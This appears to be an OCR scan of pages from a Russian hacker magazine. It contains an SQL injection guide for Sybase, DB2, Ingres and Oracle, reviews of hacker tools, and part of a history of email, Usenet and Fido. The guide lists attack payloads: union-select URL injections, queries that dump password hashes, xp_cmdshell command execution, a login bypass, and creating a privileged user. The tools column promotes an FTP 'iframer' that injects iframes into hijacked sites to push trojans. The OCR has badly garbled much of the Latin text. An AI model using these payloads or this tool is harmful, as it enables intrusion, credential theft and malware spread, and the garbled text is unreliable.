ЭКЗОТИЧЕСКИЕ СИСТЕМЫ УПРАВЛЕНИЯ БАЗАМИ ДАННЫХ: ОВ2,5УВА5Е И ІЫ0РЕ5. 
ЕСЛИ ТЫ ДУМАЕШЬ, ЧТО ЭТИ СУБД НЕ ВСТРЕЧАЮТСЯ ВО ВСЕМИРНОЙ ПАУТИНЕ, 

ТО СИЛЬНО ОШИБАЕШЬСЯ. 



ИСТОРИЯ 

Прежде чем углубляться описание особенностей инъекций в названные 
СУБД, следует сказать несколько слов отом, что они вообще собой пред- 
ставляют, и об их истории, поскольку я не исключаютого обстоятельства, 
чтоты мог вообще никогда не слышать о БВ2, Іпдгез, ЗуЬазе. Заглянем в 
Вики. 

ЗуЬаге 

Вплоть до версии 4. 9 ЗуЬазе ЗОБ Зегѵег и М і с гозобТ ЗОБ Зегѵег был и 
практически идентичными. Однако в связи с возникшими разно- 
гласиями между компаниями, связанными с вопросами разделения 
доходов, ЗуЬазе и МісгозоІТ приняли решение прекратить совме- 
стное развитие продукта, несмотря на очевидное наличие общего 
наследия в виде процедурного языка Тгапзасі-ЗОБ (Т-ЗО Б) и оди- 
наковой архитектуры. Существенное отличие заключалось в том, 
что ЗуЬазе была основана на базе БЛМІХ-архитектуры, в то время 
как МісгозоІТ практически сразуушла с Б) N IX и целиком сконцен- 
трировалась на платформе ѴѴІпсІоѵѵз 1\ІТ. В настоящее время ЗуЬазе 
продолжает поддерживать и развивать версии для семейства 
ѴѴІпсІоѵѵз и различных БІКІІХ-платформ (ІВМ АІХ, НР-БІХ, 5ип Зоіагіз, 

Ѳ N БІ/Бі п их и другие). 

ІВГ-ЮВ2 

йВ2 имеет долгую историю и, как некоторые считают, стала первой СУБД, 
использующей ЗОБ. СУБД получила название йВ2 в 1 982 году, когда был 
выпущен ее релиз, а также ЗОБ/йЗ, для мейнфреймов. С 1978 года до этого 
момента продукт называется 5узЩ гл Реіабопаі, илиЗузіет В. 

История этой СУБД уходит корнями в начало 70-х, когда доктор Э.Ф. Кодд, ра- 
ботавший на ІВМ, создал теорию реляционных баз данных, в июне 1970 года 
опубликовав модель манипуляции данными. Для реализации этой модели 
он разработал языкреляционныхбазданныхи назвал егоАІрЬа. ІВМже 
предпочла поручить дальнейшую работу группе программистов, непод- 



контрольной доктору Кодду. Нарушив некоторые принципы реляционной 
модели, они реализовали ее как«Структурированный английский язык 
запросов», сокращенно 5Е0БІЕБ. Посколькуторговая марка ЗЕОБІЕБуже 
была зарегистрирована, название сократили до ЗОБ — «Структурирован- 
ный язык запросов». Таким оно осталось и по сей день. 

Іпдге-5 

Проект и экспериментальный вариант СУБД Іпдгез были разработаны в 
университете Беркли под руководством одного из наиболее известных в 
мире ученых и специалистов в области баз данных — Майкла Стоунбрей- 
кера (МісЬаеІЗіюпеЬгакег). С самого начала СУБД Іпдгез создавалась как 

«СУЩЕСТВЕННОЕ ОТЛИЧИЕ ЗАКЛЮЧА- 
ЛОСЬ В ТОМ, ЧТО 5УВА8Е БЫЛА ОСНО- 
ВАНА НА БАЗЕ ІЛЧІХ-АРХИТЕКТУРЫ, В ТО 
ВРЕМЯ КАК МІСР050РТ ПРАКТИЧЕСКИ 
СРАЗУУШЛАС ЮЫІХ И ЦЕЛИКОМ СКОН- 
ЦЕНТРИРОВАЛАСЬ НА ПЛАТФОРМЕ 
ѴѴІ N Ю 0ѴѴ5 ЫТ» 

мобильная система, функционирующая в среде ОС БІ N IX. Первая версия 
Іпдгез была рассчитана на 1 6-разрядные компьютеры и работала главным 
образом на машинах серии РйР. Это была первая СУБД, распространяе- 
мая бесплатно для использования в университетах. Впоследствии группа 
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Занимательные вторжения 

в О га с I еИййЙ№ЁЙ8ЕЖ: 



В качестве бонуса публикую часть 
недокументированных особен- 
ностей Огасіе, которыми можно 
запросто вызвать занятные 5(ЗІ_- 
инъекции: 

1. Просмотреть названиятаблиц 
можно с помощьютаблицы 
зуз.а И_1:а Ыез или изеМюЫезізуз. 
ивег_1аЫез). 

Запросы: 

Ьир;УАагде{/геІеазе.с{т?Аг1ісІеЮ=- 
1 ипіоп зеіесі 1 ,пиІІ,пиЦ,пиЦДаЫе_ 
патеігот зуз.аІПаЫез-- 

Ии р :/Да гд еі/ге Іеа зе . с{т ?Агіі с Іе 1 □=- 
1 ипіоп зеіесі 1 ,пиІІ,пиЦ,лиЦ,іаЫе_ 
пате {гот изег_іаЫез-- 

ВЫВОД: 

В обоих случаях — страница сайта с 
названием таблицы АРТІ С ИЕІ N РО . 

2 . Названия колонок находятся в 
таблице изег_1аЬ_со1итп5(зу5. 
изег_1:аЬ_соІитп5). 

Запрос: 

Иир:/АагдеѴгеІеазе.с{т?АііісІеЮ=- 
1 ипіоп зеіесі 1,лиИ,пиИ,лиИ,со1итп_ 
пате {гот изег_іаЬ_соІитпз-- 

ВЫВОД: 

Страница сайта с названием 
колонки АС. 

3. Узнать версию Оракла достаточ- 
но просто. 

Запрос: 

Иир:/Аагде{/ге1еазе.с{т?Агбс1еЮ=- 
1 ипіоп зеіесі 1 ,Ьаппег р пиІІ,пиІІ,пиІІ 
Ігот ѵ$ѵегзіол— 

Вывод: 

СОВЕ 9. 2. 0.7. 0 Ргобисііоп 



Стоунбрейкера перенесла Іпдгез в среду ОС И N IX ВВй, которая также 
была разработана в университете Беркли. Семейство СУБД Іпдгез из 
университета Беркли принято называть «университетской Іпдгез». 

В настоящее время коммерческая Іпдгез поддерживается, развивается и 
продается компанией Сотриіег Аззосіаіез. Сейчас это одна из развитых 
коммерческих реляционных СУБД. 



Іпдгез — это очень быстрая СУБД, и ее выбираютте, для кого главным 
фактором является скорость работы, выполнения запросов. 

501_-1№ЕСТ10Ы В БУ ВАЗЕ 

Вот мы и добрались до самого интересного. Сейчас я поведаютебе, как 
укротить БуЬазе мощными ЗОБ-инъекциями. 
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■ ициальный портал Іпдгез с кучей документации 

1. Смотрим версию БуЬазе: 
зеіесі @@ѵегзіоп 

2. Конкатенация осуществляется с помощью плюса: 
зігіпді + зігіпд2 

3. Запись в файл: 

сгеаіе іаЫе туіііе ( гесогсі ѵагсЬаг (2 000 ) ) ехіегпаі 
іііе аі "с : ХіетрХііІе . іхі " іпзегі іпіо туіііе 
ѵаіиез (ОхУОЬ_ВІЫАКУ_ВАТА) " 

4. Запись в файл через хр_стсІ5ЬеІІ.: 

Ьесіаге @стсі ѵагсЬаг (255) зеіесі @стсі='есЬо ЫаЫаЫа 

» с : \іі1е . іхі ' 

ехес хр_стс!зЪ.е11 @стс! 

5. Получаем хэш пароля юзера: 

зеіесі пате , раз зчлгогсі, * ігот зузіодіпз ѵіЬеге пате Ііке 
' СА0% ' 

6. Так какБубазе и М55СІІ_ — довольно похожие системы, то и синтаксис 
некоторых команд во многом схож. К примеру, выполнение команд в 
ЗуЬазе: 

хр_стс!з]те 1 1 ' с оттапсі ' 

501_-1№ЕСТ10Ы В ОВ2 

А теперь запоминаем несколько фишек, применимых к 0В2: 

1. Отбросить ненужный запрос можно, использовав комментарий: 

2. Узнаем названия таблиц: 

зеіесі пате ігот зузіЬт. зузіаЫез ; 
ог 

зеіесі іаЬпета ігот зузсаі . ІаЫез ; 

3. Смотрим имена колонок: 




Разнообразные версии 0В2 под всевозможные платформы 

зеіесі пате, іЬпате, соііуре ігот зузіЬт. зузсоіитпз ; 

4. Смотрим название базы данных: 

зеіесі сиггепі зегѵег ігот зузіЬт. зузсіиттуі ; 

5. Имя текущего пользователя БД: 

зеіесі изег ігот зузіЬт. зузсіиттуі ; 
зеіесі зеззіоп_изег ігот зузіЬт. зузсіиттуі ; 

6. Версия базы данных: 

зеіесі ѵегзіоппитЬег , ѵегзіоп_іітезіатр ігот зузіЬт. 
зузѵегзіопз ; 

7. Для объединения используется символ конкатенации (||) или оператор 
сопсаі: 

зеіесі 'х' | | 'а' 
ог 

зеіесі 'х' сопсаі 'а' 

8. Смотрим пользователей и их пароли: 

зеіесі изегпате, раззъгогЬ ігот ЬЬа_изегз; 

9. Узнаем, ккакой базе мы подключены в данный момент: 
зеіесі сиггепі зегѵег ігот зузіЬт. зузсіиттуі ; 

10. Фильтрация обходится, как и в РозІдгеБОБ, использованием функции 
СНП(). 

В качестве напоминания скажу, что если ошибка присутствует при авто- 
риза ц и и , то тут в с е ста н да ртн о . До пусти м , к Б Д отс ы л а ется та ко й за п р ос : 

зеіесі асігезз ігот изегз ѵіЬеге изег= ' асітіп' апсі 
разз= ' зесгеіразз ' 

Видим, что истинным паролем является зесгеіразз, что не имеет для нас 
значения :). 
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Тема актуальная, а автор енот. 
Взламывать Му5СІІ_уже каж- 
дый карасик научился, а когда 
появляется что-то нестан- 
дартное, возникают пробле- 
мы. Я только понять не могу, 
какого рожна тут не написано 
ни слова проОгасІе. 



Да ладно, тебе, Петров, ты-то, 
конечно, еще лет в шесть сІЬ2 
ломать научился, но не все же 
такие фрики, какты. Думаю, 
они про Огасіе отдельную 
статью сделают. Сам знаешь, 
сколько там всего! 



Добавляем небольшую строку отсебя, введя в поле пароля следующее: 

ЫаЫаЫа' ог 'х' = 'х 

Теперьзапрос принимает следующий вид: 

зеІесД асігезз Тгот изегз ѵіЬеге изег= ' асітіп' апсі 
разз='ЫаЫаЫа' ог 'х' = 'х 

Условие « п ра вил ьный_па роль ИЛИ символах’ == символу_’х’» истинно, 
и авторизацияуспешно надломана. 

ЕЩЕ НЕ КОНЕЦ 

Когда я уже собирался сдавать материал, мне на мыло отписал мой 
заграничный приятель, знавший.очемя пишу статью, и скинул мне свои 
наработки по инъекциям в Іпдгев, о которых я лишь пару раз слышал (за 
что ему биг респект). 

50І_-І№ЕСТІ0Ы В ІЫСГСЕ5 

1. Комментарии аналогичны комментариям в Ров1:дге50І_: «--» и «/**/»■ 

2. Таблицы и их владельцев узнать достаточно просто: 

зеІесВ ДаЫе_паше, ЪаЫе_оѵтег Тгош ііДаЫез; 
зеІесД геіісі, геіоѵтег, геііос Тгот іігеІаОіоп; 
зеІесД геіісі, геіоѵтег, геііос Тгот іігеІаОіоп ѵТЬеге 
геіоѵтег != '$іпдгез'; 

3. Также просто выуживаем колонки: 

зеІесД со1итп_пате, со1итп_с1аЦаЦуре , ІаЫе_паше, 
ДаЫе_оѵтег Тгот іісоіитпз; 

4. Узнаем текущего пользователя: 
зеІесВ сПэтзіпТо ( ' зеззіоп_изег ' ) ; 

5. Объединение (конкатенация) стандартная — символ «||». 

6. Название используемой базы данных: 

зеІесЪ сІЬтзіпТо ( ' ОаЦаЪазе ' ) ; 

7. Узнаем версию СУБД: 





зеіесі сПэтзіпТо ( '_ѵегзіоп' ) ; 

8 Пользователи БД и их пароли: 

зеІесЪ паше, раззѵсгогсі Тгош ііизег; 

9 . Смотрим различные привилегии: 

зеІесЪ СЬтзіпТо ( ' с!Ь_ргіѵі1едез ' ) ; 
зеІесЪ СЬтзіпТо ( ' зесигіДу_ргіѵ' ) ; 
зеіесъ СЬтзіпТо ( ' сиггепТ_ргіѵтпазк / ) ; 
зеІесД сПэтзіпТо ( 'с1Ь_асітіп' ) ; 
зеІесД сПэтзіпТо ( ' сгеаДе_ЬаЫе ' ) ; 
зеІесД сПэтзіпТо ( ' сгеаДе_ргосе<іиге ' ) ; 
зеІесЪ СЬтзіпТо ( ' зе1есД_зузса1і ' ) ; 

1 0. Функция 51ІВ5ТП0 аналогична функции 51ІВ5ТПІ[\І0() из Му50І_. 

ЗІЛЗЗТК (зДг ,роз , Іеп) возвращает подстроку длиной Іеп 
символов из строки зДг, начиная от позиции роз. 

1 1. Врядли хватитправ, но можно попробовать создать юзера БД: 

сгеаДе изег рт ѵтЪІі раззѵтгсі = 'раззтлгогсН ; 
дгапВ аіі оп сиггепВ іпзДаІІаЦіоп До рт; ТГ 
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ЛЕОНИД «ВОЮ» ОТРОЙКОВ 

/ ПОШ@ВК.КІІ / 






Х-І00І5 

Программы для хакеров 



Л ПРОГРАММА: УЕВ РОКиМКЕАСЕК 
ОС: УІІЧ0ОУ8 2000/ХР 
АВТОР: КОНСТАНТИН ПОЛЯКОВ 




|Экономим время при чтении форумов] 



Ты хоть раз задумывался над тем, на что ты 
тратишь большую часть своего времени? Нет, я 
сейчас говорю не о Контре и шумных вечерних 
попойках во дворе твоего дома =). Прежде 
всего я имею в виду время, проведенное в 
Сети. Не знаю, на скольких форумах за реган 
ты, ноу меня их около десятка, причем самой 
разнообразной тематики. И каждый из нихтре- 
бует времени. Бывает, приедешь из универа, 
бухнешься на диван, прихватив ноут, и вперед 
— по форумам. Едва успеваешь почитать то- 
пики, ответить в личку, кое-где пофлудить — и 
все, времени на работу уже не остается (воттак 
и остаются читатели ][ без свежего материала 
в журнале =)). Шутки шутками, а доля правды 
здесь есть. Как ни стараешься сберечь время, 
все бесполезно. Но и без общения на форумах 
существование в Сети представить себе 
трудно. Следовательно, нужно искать компро- 
мисс, вариант которого я и хочу тебе сейчас 
предложить. 

Итак, обрати внимание на тулзу под названием 
ѴѴеЬ Рогит Пеабег. Прога по своей сути уни- 
кальная и способная сэкономить тебе массу 



времени. Но еслиты думаешь, что она сможет 
читатьтопики и оставлять посты на излюблен- 
ных бордах вместо тебя, тоты ошибаешься :). 
Софтина предназначена исключительно для 
чтения форумов и разного рода конференций. 
Тебе достаточно добавить нужный форум в 
утилу, и впоследствии ты сможешьузнавать обо 
всех произошедших на нем изменениях через 
несколько секунд. Причем для этого тебе даже 
не потребуется запускать браузер =). Тулза будет 
отображать только новые и измененныетемы 
форума, оставляя скрытыми уже прочитанные. 
Из всех достоинств проги выделю основные: 

• удобное чтение форумов (иерархи- 
ческий порядок ресурсов , сокрытие 
прочитанных тем, нет необходимо- 
сти юзать браузер и т.д. ) ; 

• поддержка распространенных фо- 
румных движков; 

• экономия трафика (что особенно 
актуально при использовании жопо- 
реза ака СРКЗ : ) ) ; 

• продуманный интерфейс . 

Думаю, по первымтрем пунктам вопросов 
не возникнет. А вот на четвертом надо 
остановиться. Дело в том, что в тулзе есть 
возможность объединения форумов в 
группы, а также синхронизация всех досок. 
Крометого, благодаря наличию вкладокты 
всегда можешь читать несколько форумов 
одновременно. О том, насколько все это 
эффективно, судить только тебе. Поэтому я 
настоятельно рекомендую затестить софтин- 
ку прямо сейчас, не откладывая на потом, 
время то идет =). 

Кстати, прога полностью русифицирована, 
огорчает одно — она платная. Но и с этим, 
полагаю, ты как-нибудь разберешься :). 



Л ПРОГРАММА: РНР ЕХРЕКТ Е0ІТОЕ 

ОС: УІІЧ0ОУ 5 2000/ХР 

АВТОР: АМКОЕ0 0ЕѴЕЮРМЕІЧТ СРОУР 




В одном из прошлых выпусков Х-Тооіз я выкла- 
дывал «доработанный» блокнот с кучей допол- 
нительных фишек. Была среди них и подсветка 
синтаксиса под самые разныеязыки, включая, 
естественно, и скриптовые. Что ж, продолжу 
добрую традицию =). Не пугайся — представ- 
лять ІЧоіерасІ третьей версии я не собираюсь :). 
Вместо этого хочу обратить твой взор в сторону 
утилы РНР Ехрегі Есіііог. По правде говоря, 
назвать это чудо «утилой» можно с трудом. Ведь 
софтина представляет собой полноценный 
РНР-ебНюгс огромным количеством возмож- 
ностей, перечисление которых заняло бы не 
одну и не две полосы вжурнале. Но я все же 
нашел в себе силы и составил урезанный список 
прибамбасов: 

• поддержка ЦТР-8, 

• настраиваемая подсветка кода, 

• свертывание кода, 



► 086 



ХАКЕР 09 /1 05/ 07 






взлом 



• встроенный браузер и РТР-клиент 
с поддержкой 8РТР, 

• Собе Рхріогег, 

• Рііе Рхріогег с «Избранными 
папками» , 

• Рго^есЮ Рхріогег, 

• ЫЬгагу Рхріогег, 

• настраиваемые горячие клавиши и 
клавиши работы в редакторе, 

• клавиатурные макросы, 

• РНР-макросы, 

• автосохранение, 

• проверка синтаксиса РНР, 

• запуск скриптов и просмотр ре- 
зультата во встроенном или внеш- 
нем браузере, 

• отладчик , 

• возможность использования 
встроенного или любого внешнего 
НТТР-сервера для запуска и отлад- 
ки РНР-скриптов , 

• поддержка всех известных 
Сопбепб-Туре , 

• быстрая вставка всех функций 
РНР с подсказкой параметров, 

• быстрая навигация в коде с помо- 
щью горячих клавиш и мышки, 

• экспорт исходного текста в НТМЬ 
и КТР с подсветкой синтаксиса, 

• закладки, 

• два стиля интерфейса — Сіаззіс и 
01 Псе ХР, 

• поддержка справки РНР с возмож- 
ностью поиска по ключевому слову 
в текущей позиции. 

Особенно радует встроенный НТТР-сервер в 
комплекте с браузером и РТР-клиентом :). Об отлад- 
чике, проверке синтаксиса, шаблонах и режимах 
подсветки (которых, кстати, три: РНР& НТМЦ НТМб 
опіу РНРопІу) я вообще молчу. Эту прогу нужно иметь 
на винтелюбомууважающемусебя РНР-кодеру, 
поскольку вещь просто прекрасная. Ставь без разду- 
мий, пригодится не раз, поверь моему опыту:). 

^ ПРОГРАММА: РТР ІГКАМЕК 
ОС: Чѵ' I N / * N I X 

О том, как поднять лава на загрузках, я писал в 
своей статье «Гоним траф» в одном из прошлых 
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номеров (полистай подшивку][). Суть идеи, как 
ты помнишь, сводилась к нагону трафика на 
конкретно взятый ресурс, с которого наивным 
юзерам и впаривался трой. Кстати, для этого 
дела отлично подойдут и крупные ресурсы с 
высокой посещаемостью. Посуди сам, так го- 
раздо удобнее: проифраймил пару раскручен- 
ных порталов — и несколько тысяч загрузок 
за сутки утебя в кармане :). Однако к решению 
поставленной задачи можно подойти и более 
радикально. Ведь поиметьжеланный ресурс 
удается далеко не всегда, а вот куча мелких 
хостингов есть под рукой почти всегда. Поче- 
му бы не приобщить их к работе? :) Вот только 
появляется одна серьезная проблема: как 
вставлять ифрайм-код в чужие индекс-стра- 
ницы? Делать это вручную долго и геморрой- 
но, да и заменять восстановленные файлы 
неудобно. Поэтому в таких случаях принято 
использовать РТР-ифраймеры. Кстати, твоему 
вниманию я сейчас представляю именно 
РТР Плате г — РНР-скрипт, позволяющий не 
только прочекать список РТР-аккаунтов на 
валидность, но и проифраймить все соответ- 
ствующие ресурсы. Долго распинаться не 
буду, скажу лишь, что есть как возможность 
дозаписи собственного кода в іпсіех-файлы, 
так и возможность перезаписи іпсіех-файлов. 
Также тулза умеет заливать необходимое фай- 
ло на серверы, РТР-аккаунты к которым есть 
в наличии =). Кроме того, ты сам можешь вы- 
б рать в ид л и ста с а ккау нта м и , кото р ы й и будет 
в последствии скормлен РТР-ифраймеру. Ну 
и, конечноже, редактирование кода, который 
необходимо вставить в чужие индекс-стра- 
ницы, — это приятная возможность. Кстати, 
этот скрипт идеально подходит для масс-де- 
фейсов, воттолько заниматься ими не стоит, 
лучше гони траф и не парься =). 



Л ПРОГРАММА: РІЕ 

ОС: УІІЧООУЗ 2000/ХР 

АВТОР: НЕИ5РАѴІЧ (НЕІ_І_5РАУІЧ.ІЧМ.КІ_0 




|Определительупаковщика файлов| 



В настоящее время производители программ изо- 
щряются иупаковываютсвоитворения различными 
пакерами, которых развелосьогромное количество. 
Это обстоятельство отравляет жизнь крякеров, кото- 
рых хлебом не корми — дай что-нибудь взломать:). 
Тебя никогда не заводили в тупик подобные сжатые 
ехе-файлы?Еслида,тотебе просто нужно быстро 
и правильно определить тип упаковщика файла, 
чтобы потом расковырять его (файл) и безжалостно 
взл о мать : ) . Дл я это го существует м н о го п ро гра м м , 
но, на мой взгляд, самой эффективной является 
утилита ОІЕ, которая с максимальной вероятно- 
стью определяеттип упаковщика (протектора, 
компилятора) сжато го файл а. А эта информация и 
необходима крякеру для дальнейшей распаковки 
приложения. Помимоэтого, крошка ОІЕ имеет ряд 
полезных функций и фишек: 

• просмотр импорта , секций, Ьех; 

• дизасемлирование файла; 

• просмотр основных характеристик РЕ ; 

• получение хеша МБ5 , СКС-32; 

• поддержка плагинов ; 

• копирование содержимого файла по 

дабл-клику . 

Что касается плагинов для утилы ОІЕ, то их сможет 
написатьлюбойжелающий. Кпримеру, нетак 
давно на форуме сгаскіаб.ги была опубликована 
новостьо плагинедля ЭІЕ ( ѵѵѵѵѵѵ.сгаскІаЬ.гиЛ/іпсІех. 
рЬр?асІіоп=ѵіЬгеаб&Іоріс=9347(Шгипп=3&раде=-1 ). 
позволяющем проверить файл с помощью подоб- 
ной программы Ехеіпію ( ѵѵѵѵѵѵ.ехеіпЬ.до.рІ ) прямо 
из основного окна ОІЕ. Но, по мнениюучастников 
форума СгаскЕаЬ, Ехеіпію по своему функционалу 
уступает ОІЕ. Короче, попробуй сам, и, надеюсь, 
тебе прога тоже понравится :].И 
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МАРИЯ «МІРВІІ.І.» НЕФЕДОВА 

/ міршшзпшоіск.іиі / 

ІЫТЕВЫЕТ— 

СОШСМБ ПОРШ 

ИСТОРИЯ СЕТЕВЫХ СРЕДСТВ ОБЩЕНИЯ 

НАШ РОДНОЙ ИНТЕРНЕТ, МОЖНО СКАЗАТЬ, ДЕРЖИТСЯ НА ДВУХ СТОЛ ПАХ, ДВУХ ОС- 
НОВНЫХ СОСТАВЛЯЮЩИХ: РАЗНООБРАЗНАЯ ИНФОРМАЦИЯ И ЛЮДИ. БЕССПОРНО, 
ИНФОРМАЦИЯ - ЭТО НАСТОЯЩИЙ НАРКОТИК, НО ЧИТАТЬ КИЛОБАЙТЫ ТЕКСТА И 
ПРОСМАТРИВАТЬ МЕГАБАЙТЫ КАРТИНОК ЧЕЛОВЕКУ, НЕДАВНО ПОПАВШЕМУ В СЕТЬ, 
БЫСТРО НАДОЕДАЕТ, И ОН СТРЕМИТСЯ КОБЩЕНИЮ. ОБСУДИТЬ, ПОДЕЛИТЬСЯ, ПО- 
СПОРИТЬ И ПРОЧЕЕ, ПРОЧЕЕ... И ЛЮДИ ГОВОРЯТ, ПИШУТ, СОЗДАЮТ САЙТЫ И БЛОГИ, 
СТРАНИЧКИ И РТР, ПОПОЛНЯЯ БЕЗДОННУЮ КОПИЛКУ ИНФОРМАЦИИ - СЕТЬ. 
СЕТЕВЫЕ СРЕДСТВА ОБЩЕНИЯ НЕ СТОЯТ НА МЕСТЕ, ЭВОЛЮЦИОНИРУЯ ВМЕСТЕ С 
ТЕХНОЛОГИЯМИ И СТАРАЯСЬ ОТВЕЧАТЬ ТРЕБОВАНИЯМ ПОЛЬЗОВАТЕЛЕЙ. ВСЕВОЗ- 
МОЖНЫЕ СЕТЕВЫЕ ПЕЙДЖЕРЫ, БЛОГИ, ЧАТЫ, ФОРУМЫ, ПРОГРАММЫ ДЛЯ ГОЛО- 
СОВОГО И ВИДЕООБЩЕНИЯ - СЕГОДНЯ РЕЧЬ ПОЙДЕТ ИМЕННО О НИХ, О СРЕДСТВАХ 
КОММУНИКАЦИИ В СЕТИ, А ТАКЖЕ О ЛЮДЯХ, КОТОРЫЕ ИХСОЗДАЛИ И ДЛЯ КОТОРЫХ 
ОНИ БЫЛИ СОЗДАНЫ. 



ЕМАІІ. 

Начнем, какэто ни странно, с начала. Точнее, с эпохи сетевой зари, когда 
первым светлым умам в голову пришла идея, как можно общаться в Сети. 
Одним из основных способов общения с самого начала и по сей день был 
и остается етаііака электронная почта. По правде сказать, электронная 
почта появилась раньше, чем интернет, и послужила одним из ключевых 
инструментов при его создании. Так, в 1 961 команда Фернандо Корбато из 
Массачусетского технологического института представила на суд общест- 
венности свою разработку — ось СотраііЫеТіте-ЗЬагіпд Зузіет (СТ55). 
Ее запустили на ІВМ 7094, соединив между собой 30 терминалов 
института. Ось позволяла нескольким людям одновременно работать 
на одной машине, чем существенно экономила время. Кроме того, что 
это была первая ОС стехнологией разделения машинного времени. 

В 1 965 году появилась полезная функция, позволившая людям со 
связанных терминалов обмениваться текстовыми сообщениями. И 
уже к концу 1 966-го етаіі стал тем, чем является и сейчас, — элек- 
тронной почтой. 

В разработки, касающиеся электронной почты, были вложены огромные 
средства Министерства обороны США. В те годы правительство США возло- 
жило на Министерство обороны и Агентство передовых исследовательских 



проектов США (АВРА) миссию по созданию надежной системы передачи 
данных. Впоследствии именно этот проект и породил Всемирную паутину. 
Сначала появилась компьютерная сеть АРРАЫЕТ (АсІѵапсесІ РезеагсЬ 
РгоіесШ Адепсу Ыеіѵѵогк), соединившая между собой ряд университетов 
и исследовательских центров. Сеть развивалась быстро, в основном ей 
пользовалисьученые изупомянутых организаций. Способ обмена элек- 
тронными сообщениями пришелся в АРРАЫЕТ более чем кстати. В 1971-м 
публике был представлен первый етаіі-клиент, после чего электронная 
почта буквально покорила научную сеть своей простой и удобством. 
Раймонд Томлинсон, плотно занятый в разработке первой системы 
электронной почты, придумал использовать символ 0, чтобы отделить 
пользователя от его машины, которая ранее и использовалась в 
качестве электронного адреса. Первый етаіі, отправленный ученым 
(которого можно считать отцом электронной почты), был, мягко говоря, 
малоинформативным: «СѴѴЕРТУІЛ ОР» — значилосьвписьме:).И 
сначала, когда Томплинсон показал почтовую систему коллегам, те 
отнеслись к ней с прохладцей, сказав, что это явнонето, надчемони 
должны работать. 

В 70-х развитие АРРАЫЕТ продолжилось, был проложен трансатланти- 
ческий кабель и к сети подключились организации Великобритании и 
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Норвегии, сделав сеть международной. В обиход вошли первые почтовые 
рассылки, группы новостей и доски объявлений (о которых речь пойдет 
ниже). Электронная почта стала популярным, удобным и быстрым средст- 
вом общения, и, думаю, ктому времени коллеги Томлинсона поняли, как 
сильно они ошибались... 

Сегодня электронный почтовый ящик — это едва ли не первая сетевая 
необходимость. Он нужен как средство общения, нужен при регистрации 
на всевозможных ресурсах Сети и просто нужен. 

ІІ5ЕЫЕТ Ш5ЕК ЫЕТѴѴОКК) 

Параллельно с будущим интернетом, то есть сетью АРРАЫЕТ, развива- 
лись и ее конкуренты, давшие Всемирной паутине ничуть не меньше. К 
примеру, ЫЭРЫеІ (ЫаііопаІЭсіепсе Роипбаііоп Меіѵѵогк), объединившая 
множество мелких сетей, втом числе и ІІзепер о которой мы сейчас и 
поговорим. 

Эта сеть использовалась и используется по сей день для общения и пуб- 
ликации файлов. Появилась она еще в 1 980 году и потому является одной 
из старейших сетей. Разработали систему аспиранты Университета Дью- 
ка — Том Трускотт и Джим Эллис. ІІзепеі состоит из новостных групп (от 
английского пеѵѵБдгоирз), илиже конференций. Принцип работы, то есть 



форматсообщений и способ их передачи, похож на электронную почту. Но 
вто время как общение по етаіі происходит один на один, в ІІзепеі дейст- 
вует принцип «один на всех». Сообщения, которые постят пользователи, 
делятся потематике ньюсгрупп, а ньюсгруппы уже организуют собствен- 
ную структуру, похожую на структуру доме иных имен. Пользовательские 
посты хранятся на большом количестве серверов (серверы обмениваются 
сообщениями друге другом). 

В наши дни почти весьтрафик ІІзепеі передается через интернет. Но, 
учитывая, что объемы информации в ІІзепеі огромны (по некоторым под- 
счетам, около бтерабайт в сутки), ее передача — дело весьма накладное. 
Некоторые провайдеры предоставляют доступ ксвоим новостным сер- 
верам бесплатно, но зачастую у них нет доступа к большинству новостных 
групп и их содержимому. Поэтому доступ к большей части информации 
предоставляют платные новостные серверы, коих очень много. 

Многие публикации не покидают пределов ІІзепер а возможность обсу- 
ждения информации, высокий уровень анонимности, отличная скорость, 
принцип работы каку РТР-сервера (не надо делиться, отдавать, набирать 
рейтинг) и зачастую уникальность публикуемой информации — это именното, 
что поддерживает II зепеі на плаву. Именно из ІІзепеі родом многие распро- 
страненные понятия, такие как«смайлики», «модераторы», «РАО», «спам» ит.д. 
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Для ІІзепеІ существует множество клиентов: ЫемзБеесбег и ІІзепеІ 
Ехріогегдля ѴѴІпсіоѵѵб; ііпізоп под МасОБ; ЫЕВѲеі для Ыпих и куча кросс- 
платформенных клиентов. Поддерживают систему также ОиНоок, Могіііа 
ТЬипсІегЬігсІ и браузер Орега. 

Поисктекста и файлов по конференциям ІІзепеІ осуществляет, например, 
Ѳоодіе ( дгоирз.доодіе.сот ) плюс великое множество специализиро- 
ванных поисковиков (вотнесколько из них: пеѵѵгІеесЬ.сот . ѵаЬзе.сот . 
ЬіпзеагсЬ.іпіо ). 

ФИДО (РШОЫЕТ) 

Чуть позже ІІзепеІ; на свет появилась святая святых для многих наших 
читателей — Фидонет. Придумали эту сеть в 1984 году два американских 
программиста — Том Дженнингс и Джон Мэдилл. Символ-логотип-талис- 
ман Фидо — это собака с дискеткой в зубах. В сети существует байка, что 
собаку Дженнингса звали Фидо (это довольно распространенное собачье 
имя), отсюда и название, и лого. На самом делеэто нетак — уДженнингса 
вообще не было собаки. Аслово Бібо он взял с какого-то стикера, который 
висел у него на мониторе и попался на глаза. 

Фидо не является частью интернета, и, чтобы подключиться к ней, не 
нужны услуги провайдеров. Основная функция сети — обмен текстовыми 
сообщениями. Возможность обмена файлами хоть и имеется, но исполь- 
зуется довольно редко. 

Исходно Фидо состояла из компьютеров, настроенных на обмен информа- 
цией другсдругом. Сегодняже, благодаря протоколу Ьіпкр, подключиться 
кФидо можно и через интернет. Также многие интернет-ресурсытрансли- 
руютэхи, публикуя их материалы. 

Во многом Фидо похожа на ІІзепеІ;; общение происходит в эхоконферен- 
циях (эхах) и посредством нетмейла (пеіппаіі) — своеобразного аналога 
электронной почты. Как нетрудно догадаться, нетмейл — это личная 
переписка, а сообщения, отправленные в эху, видят всеее подписчики. 
Кстати, легендарное оружие модератора — «плюсомет» — пришло к нам 
именно из Фидо. Вынося предупреждение пользователю, модератор 
награждал его определенным символом, который обозначал степень 
тяжести нарушения. Среди таких обозначений былизвезда (*), кол (!) итот 
самый плюс (+). Здесьже появились и понятия «поинтовка», «сисопка». 

В России Фидо и сейчас сохраняет популярность, тогда как во всем мире 
пикее использования пришелся на середину 90-х, когда сеть насчиты- 
вала порядка 40 тысяч узлов. На сегодняшний день русские фидошники 
сильно озабочены падением интереса к их сети, основной причиной 
которого многие считают отсутствие гипертекста. Самый последователь- 
ный и упорный пропагандист векторной графики и гипертекста в Фидо 
— личность весьма известная: МНЬдоНЬе ѴѴеЬтазіег (Сергей Соколов, 
системный операторузла 2:5063/88). Разработки, которые ведутся в этом 
